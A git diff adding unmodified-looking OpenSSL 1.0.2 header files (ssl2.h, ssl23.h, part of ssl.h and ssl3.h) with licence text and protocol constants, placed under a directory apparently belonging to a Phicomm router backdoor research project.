+# define SSL_R_UNKNOWN_KEY_EXCHANGE_TYPE                  250
+# define SSL_R_UNKNOWN_PKEY_TYPE                          251
+# define SSL_R_UNKNOWN_PROTOCOL                           252
+# define SSL_R_UNKNOWN_REMOTE_ERROR_TYPE                  253
+# define SSL_R_UNKNOWN_SSL_VERSION                        254
+# define SSL_R_UNKNOWN_STATE                              255
+# define SSL_R_UNSAFE_LEGACY_RENEGOTIATION_DISABLED       338
+# define SSL_R_UNSUPPORTED_CIPHER                         256
+# define SSL_R_UNSUPPORTED_COMPRESSION_ALGORITHM          257
+# define SSL_R_UNSUPPORTED_DIGEST_TYPE                    326
+# define SSL_R_UNSUPPORTED_ELLIPTIC_CURVE                 315
+# define SSL_R_UNSUPPORTED_PROTOCOL                       258
+# define SSL_R_UNSUPPORTED_SSL_VERSION                    259
+# define SSL_R_UNSUPPORTED_STATUS_TYPE                    329
+# define SSL_R_USE_SRTP_NOT_NEGOTIATED                    369
+# define SSL_R_WRITE_BIO_NOT_SET                          260
+# define SSL_R_WRONG_CERTIFICATE_TYPE                     383
+# define SSL_R_WRONG_CIPHER_RETURNED                      261
+# define SSL_R_WRONG_CURVE                                378
+# define SSL_R_WRONG_MESSAGE_TYPE                         262
+# define SSL_R_WRONG_NUMBER_OF_KEY_BITS                   263
+# define SSL_R_WRONG_SIGNATURE_LENGTH                     264
+# define SSL_R_WRONG_SIGNATURE_SIZE                       265
+# define SSL_R_WRONG_SIGNATURE_TYPE                       370
+# define SSL_R_WRONG_SSL_VERSION                          266
+# define SSL_R_WRONG_VERSION_NUMBER                       267
+# define SSL_R_X509_LIB                                   268
+# define SSL_R_X509_VERIFICATION_SETUP_PROBLEMS           269
+
+#ifdef  __cplusplus
+}
+#endif
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/ssl2.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/ssl2.h
new file mode 100644
index 0000000..03c7dd8
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/ssl2.h
@@ -0,0 +1,265 @@
+/* ssl/ssl2.h */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#ifndef HEADER_SSL2_H
+# define HEADER_SSL2_H
+
+#ifdef  __cplusplus
+extern "C" {
+#endif
+
+/* Protocol Version Codes */
+# define SSL2_VERSION            0x0002
+# define SSL2_VERSION_MAJOR      0x00
+# define SSL2_VERSION_MINOR      0x02
+/* #define SSL2_CLIENT_VERSION  0x0002 */
+/* #define SSL2_SERVER_VERSION  0x0002 */
+
+/* Protocol Message Codes */
+# define SSL2_MT_ERROR                   0
+# define SSL2_MT_CLIENT_HELLO            1
+# define SSL2_MT_CLIENT_MASTER_KEY       2
+# define SSL2_MT_CLIENT_FINISHED         3
+# define SSL2_MT_SERVER_HELLO            4
+# define SSL2_MT_SERVER_VERIFY           5
+# define SSL2_MT_SERVER_FINISHED         6
+# define SSL2_MT_REQUEST_CERTIFICATE     7
+# define SSL2_MT_CLIENT_CERTIFICATE      8
+
+/* Error Message Codes */
+# define SSL2_PE_UNDEFINED_ERROR         0x0000
+# define SSL2_PE_NO_CIPHER               0x0001
+# define SSL2_PE_NO_CERTIFICATE          0x0002
+# define SSL2_PE_BAD_CERTIFICATE         0x0004
+# define SSL2_PE_UNSUPPORTED_CERTIFICATE_TYPE 0x0006
+
+/* Cipher Kind Values */
+# define SSL2_CK_NULL_WITH_MD5                   0x02000000/* v3 */
+# define SSL2_CK_RC4_128_WITH_MD5                0x02010080
+# define SSL2_CK_RC4_128_EXPORT40_WITH_MD5       0x02020080
+# define SSL2_CK_RC2_128_CBC_WITH_MD5            0x02030080
+# define SSL2_CK_RC2_128_CBC_EXPORT40_WITH_MD5   0x02040080
+# define SSL2_CK_IDEA_128_CBC_WITH_MD5           0x02050080
+# define SSL2_CK_DES_64_CBC_WITH_MD5             0x02060040
+# define SSL2_CK_DES_64_CBC_WITH_SHA             0x02060140/* v3 */
+# define SSL2_CK_DES_192_EDE3_CBC_WITH_MD5       0x020700c0
+# define SSL2_CK_DES_192_EDE3_CBC_WITH_SHA       0x020701c0/* v3 */
+# define SSL2_CK_RC4_64_WITH_MD5                 0x02080080/* MS hack */
+
+# define SSL2_CK_DES_64_CFB64_WITH_MD5_1         0x02ff0800/* SSLeay */
+# define SSL2_CK_NULL                            0x02ff0810/* SSLeay */
+
+# define SSL2_TXT_DES_64_CFB64_WITH_MD5_1        "DES-CFB-M1"
+# define SSL2_TXT_NULL_WITH_MD5                  "NULL-MD5"
+# define SSL2_TXT_RC4_128_WITH_MD5               "RC4-MD5"
+# define SSL2_TXT_RC4_128_EXPORT40_WITH_MD5      "EXP-RC4-MD5"
+# define SSL2_TXT_RC2_128_CBC_WITH_MD5           "RC2-CBC-MD5"
+# define SSL2_TXT_RC2_128_CBC_EXPORT40_WITH_MD5  "EXP-RC2-CBC-MD5"
+# define SSL2_TXT_IDEA_128_CBC_WITH_MD5          "IDEA-CBC-MD5"
+# define SSL2_TXT_DES_64_CBC_WITH_MD5            "DES-CBC-MD5"
+# define SSL2_TXT_DES_64_CBC_WITH_SHA            "DES-CBC-SHA"
+# define SSL2_TXT_DES_192_EDE3_CBC_WITH_MD5      "DES-CBC3-MD5"
+# define SSL2_TXT_DES_192_EDE3_CBC_WITH_SHA      "DES-CBC3-SHA"
+# define SSL2_TXT_RC4_64_WITH_MD5                "RC4-64-MD5"
+
+# define SSL2_TXT_NULL                           "NULL"
+
+/* Flags for the SSL_CIPHER.algorithm2 field */
+# define SSL2_CF_5_BYTE_ENC                      0x01
+# define SSL2_CF_8_BYTE_ENC                      0x02
+
+/* Certificate Type Codes */
+# define SSL2_CT_X509_CERTIFICATE                0x01
+
+/* Authentication Type Code */
+# define SSL2_AT_MD5_WITH_RSA_ENCRYPTION         0x01
+
+# define SSL2_MAX_SSL_SESSION_ID_LENGTH          32
+
+/* Upper/Lower Bounds */
+# define SSL2_MAX_MASTER_KEY_LENGTH_IN_BITS      256
+# ifdef OPENSSL_SYS_MPE
+#  define SSL2_MAX_RECORD_LENGTH_2_BYTE_HEADER    29998u
+# else
+#  define SSL2_MAX_RECORD_LENGTH_2_BYTE_HEADER    32767u
+                                                       /* 2^15-1 */
+# endif
+# define SSL2_MAX_RECORD_LENGTH_3_BYTE_HEADER    16383/* 2^14-1 */
+
+# define SSL2_CHALLENGE_LENGTH   16
+/*
+ * #define SSL2_CHALLENGE_LENGTH 32
+ */
+# define SSL2_MIN_CHALLENGE_LENGTH       16
+# define SSL2_MAX_CHALLENGE_LENGTH       32
+# define SSL2_CONNECTION_ID_LENGTH       16
+# define SSL2_MAX_CONNECTION_ID_LENGTH   16
+# define SSL2_SSL_SESSION_ID_LENGTH      16
+# define SSL2_MAX_CERT_CHALLENGE_LENGTH  32
+# define SSL2_MIN_CERT_CHALLENGE_LENGTH  16
+# define SSL2_MAX_KEY_MATERIAL_LENGTH    24
+
+# ifndef HEADER_SSL_LOCL_H
+#  define  CERT           char
+# endif
+
+# ifndef OPENSSL_NO_SSL_INTERN
+
+typedef struct ssl2_state_st {
+    int three_byte_header;
+    int clear_text;             /* clear text */
+    int escape;                 /* not used in SSLv2 */
+    int ssl2_rollback;          /* used if SSLv23 rolled back to SSLv2 */
+    /*
+     * non-blocking io info, used to make sure the same args were passwd
+     */
+    unsigned int wnum;          /* number of bytes sent so far */
+    int wpend_tot;
+    const unsigned char *wpend_buf;
+    int wpend_off;              /* offset to data to write */
+    int wpend_len;              /* number of bytes passwd to write */
+    int wpend_ret;              /* number of bytes to return to caller */
+    /* buffer raw data */
+    int rbuf_left;
+    int rbuf_offs;
+    unsigned char *rbuf;
+    unsigned char *wbuf;
+    unsigned char *write_ptr;   /* used to point to the start due to 2/3 byte
+                                 * header. */
+    unsigned int padding;
+    unsigned int rlength;       /* passed to ssl2_enc */
+    int ract_data_length;       /* Set when things are encrypted. */
+    unsigned int wlength;       /* passed to ssl2_enc */
+    int wact_data_length;       /* Set when things are decrypted. */
+    unsigned char *ract_data;
+    unsigned char *wact_data;
+    unsigned char *mac_data;
+    unsigned char *read_key;
+    unsigned char *write_key;
+    /* Stuff specifically to do with this SSL session */
+    unsigned int challenge_length;
+    unsigned char challenge[SSL2_MAX_CHALLENGE_LENGTH];
+    unsigned int conn_id_length;
+    unsigned char conn_id[SSL2_MAX_CONNECTION_ID_LENGTH];
+    unsigned int key_material_length;
+    unsigned char key_material[SSL2_MAX_KEY_MATERIAL_LENGTH * 2];
+    unsigned long read_sequence;
+    unsigned long write_sequence;
+    struct {
+        unsigned int conn_id_length;
+        unsigned int cert_type;
+        unsigned int cert_length;
+        unsigned int csl;
+        unsigned int clear;
+        unsigned int enc;
+        unsigned char ccl[SSL2_MAX_CERT_CHALLENGE_LENGTH];
+        unsigned int cipher_spec_length;
+        unsigned int session_id_length;
+        unsigned int clen;
+        unsigned int rlen;
+    } tmp;
+} SSL2_STATE;
+
+# endif
+
+/* SSLv2 */
+/* client */
+# define SSL2_ST_SEND_CLIENT_HELLO_A             (0x10|SSL_ST_CONNECT)
+# define SSL2_ST_SEND_CLIENT_HELLO_B             (0x11|SSL_ST_CONNECT)
+# define SSL2_ST_GET_SERVER_HELLO_A              (0x20|SSL_ST_CONNECT)
+# define SSL2_ST_GET_SERVER_HELLO_B              (0x21|SSL_ST_CONNECT)
+# define SSL2_ST_SEND_CLIENT_MASTER_KEY_A        (0x30|SSL_ST_CONNECT)
+# define SSL2_ST_SEND_CLIENT_MASTER_KEY_B        (0x31|SSL_ST_CONNECT)
+# define SSL2_ST_SEND_CLIENT_FINISHED_A          (0x40|SSL_ST_CONNECT)
+# define SSL2_ST_SEND_CLIENT_FINISHED_B          (0x41|SSL_ST_CONNECT)
+# define SSL2_ST_SEND_CLIENT_CERTIFICATE_A       (0x50|SSL_ST_CONNECT)
+# define SSL2_ST_SEND_CLIENT_CERTIFICATE_B       (0x51|SSL_ST_CONNECT)
+# define SSL2_ST_SEND_CLIENT_CERTIFICATE_C       (0x52|SSL_ST_CONNECT)
+# define SSL2_ST_SEND_CLIENT_CERTIFICATE_D       (0x53|SSL_ST_CONNECT)
+# define SSL2_ST_GET_SERVER_VERIFY_A             (0x60|SSL_ST_CONNECT)
+# define SSL2_ST_GET_SERVER_VERIFY_B             (0x61|SSL_ST_CONNECT)
+# define SSL2_ST_GET_SERVER_FINISHED_A           (0x70|SSL_ST_CONNECT)
+# define SSL2_ST_GET_SERVER_FINISHED_B           (0x71|SSL_ST_CONNECT)
+# define SSL2_ST_CLIENT_START_ENCRYPTION         (0x80|SSL_ST_CONNECT)
+# define SSL2_ST_X509_GET_CLIENT_CERTIFICATE     (0x90|SSL_ST_CONNECT)
+/* server */
+# define SSL2_ST_GET_CLIENT_HELLO_A              (0x10|SSL_ST_ACCEPT)
+# define SSL2_ST_GET_CLIENT_HELLO_B              (0x11|SSL_ST_ACCEPT)
+# define SSL2_ST_GET_CLIENT_HELLO_C              (0x12|SSL_ST_ACCEPT)
+# define SSL2_ST_SEND_SERVER_HELLO_A             (0x20|SSL_ST_ACCEPT)
+# define SSL2_ST_SEND_SERVER_HELLO_B             (0x21|SSL_ST_ACCEPT)
+# define SSL2_ST_GET_CLIENT_MASTER_KEY_A         (0x30|SSL_ST_ACCEPT)
+# define SSL2_ST_GET_CLIENT_MASTER_KEY_B         (0x31|SSL_ST_ACCEPT)
+# define SSL2_ST_SEND_SERVER_VERIFY_A            (0x40|SSL_ST_ACCEPT)
+# define SSL2_ST_SEND_SERVER_VERIFY_B            (0x41|SSL_ST_ACCEPT)
+# define SSL2_ST_SEND_SERVER_VERIFY_C            (0x42|SSL_ST_ACCEPT)
+# define SSL2_ST_GET_CLIENT_FINISHED_A           (0x50|SSL_ST_ACCEPT)
+# define SSL2_ST_GET_CLIENT_FINISHED_B           (0x51|SSL_ST_ACCEPT)
+# define SSL2_ST_SEND_SERVER_FINISHED_A          (0x60|SSL_ST_ACCEPT)
+# define SSL2_ST_SEND_SERVER_FINISHED_B          (0x61|SSL_ST_ACCEPT)
+# define SSL2_ST_SEND_REQUEST_CERTIFICATE_A      (0x70|SSL_ST_ACCEPT)
+# define SSL2_ST_SEND_REQUEST_CERTIFICATE_B      (0x71|SSL_ST_ACCEPT)
+# define SSL2_ST_SEND_REQUEST_CERTIFICATE_C      (0x72|SSL_ST_ACCEPT)
+# define SSL2_ST_SEND_REQUEST_CERTIFICATE_D      (0x73|SSL_ST_ACCEPT)
+# define SSL2_ST_SERVER_START_ENCRYPTION         (0x80|SSL_ST_ACCEPT)
+# define SSL2_ST_X509_GET_SERVER_CERTIFICATE     (0x90|SSL_ST_ACCEPT)
+
+#ifdef  __cplusplus
+}
+#endif
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/ssl23.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/ssl23.h
new file mode 100644
index 0000000..9de4685
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/ssl23.h
@@ -0,0 +1,84 @@
+/* ssl/ssl23.h */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#ifndef HEADER_SSL23_H
+# define HEADER_SSL23_H
+
+#ifdef  __cplusplus
+extern "C" {
+#endif
+
+/*
+ * client
+ */
+/* write to server */
+# define SSL23_ST_CW_CLNT_HELLO_A        (0x210|SSL_ST_CONNECT)
+# define SSL23_ST_CW_CLNT_HELLO_B        (0x211|SSL_ST_CONNECT)
+/* read from server */
+# define SSL23_ST_CR_SRVR_HELLO_A        (0x220|SSL_ST_CONNECT)
+# define SSL23_ST_CR_SRVR_HELLO_B        (0x221|SSL_ST_CONNECT)
+
+/* server */
+/* read from client */
+# define SSL23_ST_SR_CLNT_HELLO_A        (0x210|SSL_ST_ACCEPT)
+# define SSL23_ST_SR_CLNT_HELLO_B        (0x211|SSL_ST_ACCEPT)
+
+#ifdef  __cplusplus
+}
+#endif
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/ssl3.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/ssl3.h
new file mode 100644
index 0000000..e681d50
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/ssl3.h
@@ -0,0 +1,774 @@
+/* ssl/ssl3.h */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+/* ====================================================================
+ * Copyright (c) 1998-2002 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+/* ====================================================================
+ * Copyright 2002 Sun Microsystems, Inc. ALL RIGHTS RESERVED.
+ * ECC cipher suite support in OpenSSL originally developed by
+ * SUN MICROSYSTEMS, INC., and contributed to the OpenSSL project.
+ */
+
+#ifndef HEADER_SSL3_H
+# define HEADER_SSL3_H
+
+# ifndef OPENSSL_NO_COMP
+#  include <openssl/comp.h>
+# endif
+# include <openssl/buffer.h>
+# include <openssl/evp.h>
+# include <openssl/ssl.h>
+
+#ifdef  __cplusplus
+extern "C" {
+#endif
+
+/*
+ * Signalling cipher suite value from RFC 5746
+ * (TLS_EMPTY_RENEGOTIATION_INFO_SCSV)
+ */
+# define SSL3_CK_SCSV                            0x030000FF
+
+/*
+ * Signalling cipher suite value from draft-ietf-tls-downgrade-scsv-00
+ * (TLS_FALLBACK_SCSV)
+ */
+# define SSL3_CK_FALLBACK_SCSV                   0x03005600
+
+# define SSL3_CK_RSA_NULL_MD5                    0x03000001
+# define SSL3_CK_RSA_NULL_SHA                    0x03000002
+# define SSL3_CK_RSA_RC4_40_MD5                  0x03000003
+# define SSL3_CK_RSA_RC4_128_MD5                 0x03000004
+# define SSL3_CK_RSA_RC4_128_SHA                 0x03000005
+# define SSL3_CK_RSA_RC2_40_MD5                  0x03000006
+# define SSL3_CK_RSA_IDEA_128_SHA                0x03000007
+# define SSL3_CK_RSA_DES_40_CBC_SHA              0x03000008
+# define SSL3_CK_RSA_DES_64_CBC_SHA              0x03000009
+# define SSL3_CK_RSA_DES_192_CBC3_SHA            0x0300000A
+
+# define SSL3_CK_DH_DSS_DES_40_CBC_SHA           0x0300000B
+# define SSL3_CK_DH_DSS_DES_64_CBC_SHA           0x0300000C
+# define SSL3_CK_DH_DSS_DES_192_CBC3_SHA         0x0300000D
+# define SSL3_CK_DH_RSA_DES_40_CBC_SHA           0x0300000E
+# define SSL3_CK_DH_RSA_DES_64_CBC_SHA           0x0300000F
+# define SSL3_CK_DH_RSA_DES_192_CBC3_SHA         0x03000010
+
+# define SSL3_CK_EDH_DSS_DES_40_CBC_SHA          0x03000011
+# define SSL3_CK_DHE_DSS_DES_40_CBC_SHA          SSL3_CK_EDH_DSS_DES_40_CBC_SHA
+# define SSL3_CK_EDH_DSS_DES_64_CBC_SHA          0x03000012
+# define SSL3_CK_DHE_DSS_DES_64_CBC_SHA          SSL3_CK_EDH_DSS_DES_64_CBC_SHA
+# define SSL3_CK_EDH_DSS_DES_192_CBC3_SHA        0x03000013
+# define SSL3_CK_DHE_DSS_DES_192_CBC3_SHA        SSL3_CK_EDH_DSS_DES_192_CBC3_SHA
+# define SSL3_CK_EDH_RSA_DES_40_CBC_SHA          0x03000014
+# define SSL3_CK_DHE_RSA_DES_40_CBC_SHA          SSL3_CK_EDH_RSA_DES_40_CBC_SHA
+# define SSL3_CK_EDH_RSA_DES_64_CBC_SHA          0x03000015
+# define SSL3_CK_DHE_RSA_DES_64_CBC_SHA          SSL3_CK_EDH_RSA_DES_64_CBC_SHA
+# define SSL3_CK_EDH_RSA_DES_192_CBC3_SHA        0x03000016
+# define SSL3_CK_DHE_RSA_DES_192_CBC3_SHA        SSL3_CK_EDH_RSA_DES_192_CBC3_SHA
+
+# define SSL3_CK_ADH_RC4_40_MD5                  0x03000017
+# define SSL3_CK_ADH_RC4_128_MD5                 0x03000018
+# define SSL3_CK_ADH_DES_40_CBC_SHA              0x03000019
+# define SSL3_CK_ADH_DES_64_CBC_SHA              0x0300001A
+# define SSL3_CK_ADH_DES_192_CBC_SHA             0x0300001B
+
+# if 0
+#  define SSL3_CK_FZA_DMS_NULL_SHA                0x0300001C
+#  define SSL3_CK_FZA_DMS_FZA_SHA                 0x0300001D
+#  if 0                         /* Because it clashes with KRB5, is never
+                                 * used any more, and is safe to remove
+                                 * according to David Hopwood
+                                 * <david.hopwood@zetnet.co.uk> of the
+                                 * ietf-tls list */
+#   define SSL3_CK_FZA_DMS_RC4_SHA                 0x0300001E
+#  endif
+# endif
+
+/*
+ * VRS Additional Kerberos5 entries
+ */
+# define SSL3_CK_KRB5_DES_64_CBC_SHA             0x0300001E
+# define SSL3_CK_KRB5_DES_192_CBC3_SHA           0x0300001F
+# define SSL3_CK_KRB5_RC4_128_SHA                0x03000020
+# define SSL3_CK_KRB5_IDEA_128_CBC_SHA           0x03000021
+# define SSL3_CK_KRB5_DES_64_CBC_MD5             0x03000022
+# define SSL3_CK_KRB5_DES_192_CBC3_MD5           0x03000023
